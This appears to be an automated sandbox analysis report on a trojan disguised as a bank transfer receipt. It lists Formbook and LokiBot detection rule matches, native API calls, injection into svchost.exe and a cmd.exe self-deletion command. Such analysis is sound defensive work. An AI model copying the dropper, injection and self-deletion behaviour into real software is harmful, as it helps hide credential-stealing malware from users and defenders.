Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Code function: 0_2_00F35B88
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_004015E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAD227
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA9248
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA8F8B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA969B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAA67E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA8049
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAB7B8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA01F8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAC112
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00408C6B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00408C70
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB922AE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB92EF7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE6E30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFEBB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB91FF1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8DBD2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB92B28
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB920A8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB090
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB928EC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD841F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81002
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB925DD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC0D20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACF900
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB92D07
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB91D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5EBB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A46E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A20D20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF1D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1002
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3841F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3D1FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3C944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D22FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D28C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D28C6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D22D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D22D87

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Code function: String function: 1EACB150 appears 35 times

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA9248 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AACBBD NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00418680 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_004185D0 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_004187B0 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_0041867C NtCreateFile,NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00418622 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_004185CD NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_004187AA NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB096E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB097A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB098F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB099A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A80 NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB096D0 NtCreateKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A10 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09610 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09670 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09650 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0A3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09730 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0A710 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09B00 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0A770 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09770 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09760 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB098A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09820 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0B040 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB095F0 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB099D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB095D0 NtClose,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0AD30 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09520 NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09560 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09950 NtQueueApcThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_005279BE LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00527AB1 Sleep,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_005279B9 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00527AE7 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A696E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A696D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A699A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A695D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A697A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69760 NtOpenProcess,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6A770 NtOpenThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A20 NtResumeThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A10 NtQuerySection,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A695F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A699D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69560 NtWriteFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A698A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A698F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D38680 NtReadFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D387B0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D38700 NtClose,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D385D0 NtCreateFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3867C NtCreateFile,NtReadFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D38622 NtCreateFile,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D387AA NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D385CD NtCreateFile,

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 61538 bytes, 1 file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Process Stats: CPU usage > 98%

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Binary or memory string: OriginalFilename vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000003.294702939.000000000343E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenongrav.exe vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000000.293866460.0000000000F3A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nongrav.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Metadefender: Detection: 14%
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	ReversingLabs: Detection: 26%

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe "C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe"
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/1@2/2

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F35849 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F33E45 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

